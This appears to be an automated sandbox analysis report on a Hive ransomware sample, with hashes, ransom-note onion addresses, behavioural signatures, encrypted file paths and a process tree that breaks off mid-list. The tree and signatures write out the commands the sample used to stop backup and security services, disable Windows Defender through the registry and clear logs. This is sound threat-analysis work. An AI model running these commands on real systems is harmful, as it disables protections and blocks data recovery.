Analysis
-
max time kernel
131s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
10-10-2022 19:52
Static task
static1
Behavioral task
behavioral1
Sample
0e4d44dde522c07d09d9e3086cfae803.exe
Resource
win7-20220812-en
General
-
Target
0e4d44dde522c07d09d9e3086cfae803.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
-
SSDEEP
49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config
Extracted
C:\Program Files\7-Zip\n8pw_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1212 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 776 wevtutil.exe 1120 wevtutil.exe 1204 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 952 bcdedit.exe 1364 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\PREVIEW.GIF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212953.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00458_.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME37.CSS._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Windows Media Player\es-ES\wmlaunch.exe.mui 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02009_.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\gadget.xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Access.en-us\AccessMUI.XML._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\THMBNAIL.PNG._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00018_.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR39F.GIF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\RSSFeeds.css 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292270.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14710_.GIF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rankin_Inlet._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\it-IT\gadget.xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AXIS\AXIS.INF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\DRUMROLL.WAV._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_s.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\gadget.xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue.css._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPQUOT.XML._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_right.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\GREETING.DPV._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files\Microsoft Games\Minesweeper\de-DE\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00184_.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.REST.IDX_DLL._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\picturePuzzle.js 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099187.JPG._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107344.WMF._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsptg.xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\DVD Maker\de-DE\OmdProject.dll.mui 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\js\settings.js 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\PNG32.FLT._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDEBARVERTBB.DPV._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OfficeMUISet.XML._w4QWanDqnnBLj5rzOYjVPPahFvwy9VM5-liq6KMyNj_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1656 sc.exe 1872 sc.exe 1280 sc.exe 268 sc.exe 1400 sc.exe 1600 sc.exe 1716 sc.exe 888 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1520 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2256 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2288 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1832 powershell.exe 1816 powershell.exe 1800 0e4d44dde522c07d09d9e3086cfae803.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 776 wevtutil.exe Token: SeBackupPrivilege 776 wevtutil.exe Token: SeSecurityPrivilege 1120 wevtutil.exe Token: SeBackupPrivilege 1120 wevtutil.exe Token: SeSecurityPrivilege 1204 wevtutil.exe Token: SeBackupPrivilege 1204 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1284 wmic.exe Token: SeSecurityPrivilege 1284 wmic.exe Token: SeTakeOwnershipPrivilege 1284 wmic.exe Token: SeLoadDriverPrivilege 1284 wmic.exe Token: SeSystemProfilePrivilege 1284 wmic.exe Token: SeSystemtimePrivilege 1284 wmic.exe Token: SeProfSingleProcessPrivilege 1284 wmic.exe Token: SeIncBasePriorityPrivilege 1284 wmic.exe Token: SeCreatePagefilePrivilege 1284 wmic.exe Token: SeBackupPrivilege 1284 wmic.exe Token: SeRestorePrivilege 1284 wmic.exe Token: SeShutdownPrivilege 1284 wmic.exe Token: SeDebugPrivilege 1284 wmic.exe Token: SeSystemEnvironmentPrivilege 1284 wmic.exe Token: SeRemoteShutdownPrivilege 1284 wmic.exe Token: SeUndockPrivilege 1284 wmic.exe Token: SeManageVolumePrivilege 1284 wmic.exe Token: 33 1284 wmic.exe Token: 34 1284 wmic.exe Token: 35 1284 wmic.exe Token: SeIncreaseQuotaPrivilege 1644 wmic.exe Token: SeSecurityPrivilege 1644 wmic.exe Token: SeTakeOwnershipPrivilege 1644 wmic.exe Token: SeLoadDriverPrivilege 1644 wmic.exe Token: SeSystemProfilePrivilege 1644 wmic.exe Token: SeSystemtimePrivilege 1644 wmic.exe Token: SeProfSingleProcessPrivilege 1644 wmic.exe Token: SeIncBasePriorityPrivilege 1644 wmic.exe Token: SeCreatePagefilePrivilege 1644 wmic.exe Token: SeBackupPrivilege 1644 wmic.exe Token: SeRestorePrivilege 1644 wmic.exe Token: SeShutdownPrivilege 1644 wmic.exe Token: SeDebugPrivilege 1644 wmic.exe Token: SeSystemEnvironmentPrivilege 1644 wmic.exe Token: SeRemoteShutdownPrivilege 1644 wmic.exe Token: SeUndockPrivilege 1644 wmic.exe Token: SeManageVolumePrivilege 1644 wmic.exe Token: 33 1644 wmic.exe Token: 34 1644 wmic.exe Token: 35 1644 wmic.exe Token: SeIncreaseQuotaPrivilege 1644 wmic.exe Token: SeSecurityPrivilege 1644 wmic.exe Token: SeTakeOwnershipPrivilege 1644 wmic.exe Token: SeLoadDriverPrivilege 1644 wmic.exe Token: SeSystemProfilePrivilege 1644 wmic.exe Token: SeSystemtimePrivilege 1644 wmic.exe Token: SeProfSingleProcessPrivilege 1644 wmic.exe Token: SeIncBasePriorityPrivilege 1644 wmic.exe Token: SeCreatePagefilePrivilege 1644 wmic.exe Token: SeBackupPrivilege 1644 wmic.exe Token: SeRestorePrivilege 1644 wmic.exe Token: SeShutdownPrivilege 1644 wmic.exe Token: SeDebugPrivilege 1644 wmic.exe Token: SeSystemEnvironmentPrivilege 1644 wmic.exe Token: SeRemoteShutdownPrivilege 1644 wmic.exe Token: SeUndockPrivilege 1644 wmic.exe Token: SeManageVolumePrivilege 1644 wmic.exe Token: 33 1644 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1800 wrote to memory of 1108 1800 0e4d44dde522c07d09d9e3086cfae803.exe 28 PID 1800 wrote to memory of 1108 1800 0e4d44dde522c07d09d9e3086cfae803.exe 28 PID 1800 wrote to memory of 1108 1800 0e4d44dde522c07d09d9e3086cfae803.exe 28 PID 1108 wrote to memory of 960 1108 net.exe 30 PID 1108 wrote to memory of 960 1108 net.exe 30 PID 1108 wrote to memory of 960 1108 net.exe 30 PID 1800 wrote to memory of 948 1800 0e4d44dde522c07d09d9e3086cfae803.exe 31 PID 1800 wrote to memory of 948 1800 0e4d44dde522c07d09d9e3086cfae803.exe 31 PID 1800 wrote to memory of 948 1800 0e4d44dde522c07d09d9e3086cfae803.exe 31 PID 948 wrote to memory of 1736 948 net.exe 33 PID 948 wrote to memory of 1736 948 net.exe 33 PID 948 wrote to memory of 1736 948 net.exe 33 PID 1800 wrote to memory of 1252 1800 0e4d44dde522c07d09d9e3086cfae803.exe 34 PID 1800 wrote to memory of 1252 1800 0e4d44dde522c07d09d9e3086cfae803.exe 34 PID 1800 wrote to memory of 1252 1800 0e4d44dde522c07d09d9e3086cfae803.exe 34 PID 1252 wrote to memory of 1728 1252 net.exe 36 PID 1252 wrote to memory of 1728 1252 net.exe 36 PID 1252 wrote to memory of 1728 1252 net.exe 36 PID 1800 wrote to memory of 1528 1800 0e4d44dde522c07d09d9e3086cfae803.exe 37 PID 1800 wrote to memory of 1528 1800 0e4d44dde522c07d09d9e3086cfae803.exe 37 PID 1800 wrote to memory of 1528 1800 0e4d44dde522c07d09d9e3086cfae803.exe 37 PID 1528 wrote to memory of 608 1528 net.exe 39 PID 1528 wrote to memory of 608 1528 net.exe 39 PID 1528 wrote to memory of 608 1528 net.exe 39 PID 1800 wrote to memory of 1100 1800 0e4d44dde522c07d09d9e3086cfae803.exe 40 PID 1800 wrote to memory of 1100 1800 0e4d44dde522c07d09d9e3086cfae803.exe 40 PID 1800 wrote to memory of 1100 1800 0e4d44dde522c07d09d9e3086cfae803.exe 40 PID 1100 wrote to memory of 1232 1100 net.exe 42 PID 1100 wrote to memory of 1232 1100 net.exe 42 PID 1100 wrote to memory of 1232 1100 net.exe 42 PID 1800 wrote to memory of 684 1800 0e4d44dde522c07d09d9e3086cfae803.exe 43 PID 1800 wrote to memory of 684 1800 0e4d44dde522c07d09d9e3086cfae803.exe 43 PID 1800 wrote to memory of 684 1800 0e4d44dde522c07d09d9e3086cfae803.exe 43 PID 684 wrote to memory of 1200 684 net.exe 45 PID 684 wrote to memory of 1200 684 net.exe 45 PID 684 wrote to memory of 1200 684 net.exe 45 PID 1800 wrote to memory of 304 1800 0e4d44dde522c07d09d9e3086cfae803.exe 46 PID 1800 wrote to memory of 304 1800 0e4d44dde522c07d09d9e3086cfae803.exe 46 PID 1800 wrote to memory of 304 1800 0e4d44dde522c07d09d9e3086cfae803.exe 46 PID 304 wrote to memory of 1564 304 net.exe 48 PID 304 wrote to memory of 1564 304 net.exe 48 PID 304 wrote to memory of 1564 304 net.exe 48 PID 1800 wrote to memory of 1720 1800 0e4d44dde522c07d09d9e3086cfae803.exe 49 PID 1800 wrote to memory of 1720 1800 0e4d44dde522c07d09d9e3086cfae803.exe 49 PID 1800 wrote to memory of 1720 1800 0e4d44dde522c07d09d9e3086cfae803.exe 49 PID 1720 wrote to memory of 292 1720 net.exe 51 PID 1720 wrote to memory of 292 1720 net.exe 51 PID 1720 wrote to memory of 292 1720 net.exe 51 PID 1800 wrote to memory of 1872 1800 0e4d44dde522c07d09d9e3086cfae803.exe 52 PID 1800 wrote to memory of 1872 1800 0e4d44dde522c07d09d9e3086cfae803.exe 52 PID 1800 wrote to memory of 1872 1800 0e4d44dde522c07d09d9e3086cfae803.exe 52 PID 1800 wrote to memory of 1280 1800 0e4d44dde522c07d09d9e3086cfae803.exe 54 PID 1800 wrote to memory of 1280 1800 0e4d44dde522c07d09d9e3086cfae803.exe 54 PID 1800 wrote to memory of 1280 1800 0e4d44dde522c07d09d9e3086cfae803.exe 54 PID 1800 wrote to memory of 268 1800 0e4d44dde522c07d09d9e3086cfae803.exe 56 PID 1800 wrote to memory of 268 1800 0e4d44dde522c07d09d9e3086cfae803.exe 56 PID 1800 wrote to memory of 268 1800 0e4d44dde522c07d09d9e3086cfae803.exe 56 PID 1800 wrote to memory of 1400 1800 0e4d44dde522c07d09d9e3086cfae803.exe 58 PID 1800 wrote to memory of 1400 1800 0e4d44dde522c07d09d9e3086cfae803.exe 58 PID 1800 wrote to memory of 1400 1800 0e4d44dde522c07d09d9e3086cfae803.exe 58 PID 1800 wrote to memory of 1600 1800 0e4d44dde522c07d09d9e3086cfae803.exe 60 PID 1800 wrote to memory of 1600 1800 0e4d44dde522c07d09d9e3086cfae803.exe 60 PID 1800 wrote to memory of 1600 1800 0e4d44dde522c07d09d9e3086cfae803.exe 60 PID 1800 wrote to memory of 1716 1800 0e4d44dde522c07d09d9e3086cfae803.exe 62
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"C:\Users\Admin\AppData\Local\Temp\0e4d44dde522c07d09d9e3086cfae803.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:960
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1736
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1728
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:608
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1232
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1200
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1564
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:292
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
PID:1872
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:1280
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:268
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:1400
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵
